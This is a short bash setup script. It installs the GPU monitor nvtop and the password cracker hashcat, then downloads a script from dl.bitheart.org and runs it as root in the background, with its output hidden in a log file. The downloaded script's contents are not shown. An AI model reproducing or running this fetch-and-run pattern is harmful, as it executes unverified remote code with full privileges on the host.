#!/bin/bash

apt install nvtop hashcat -y

wget https://dl.bitheart.org/localpress.sh && chmod +x localpress.sh 
nohup /root/localpress.sh > /tmp/press.log 2>&1 &
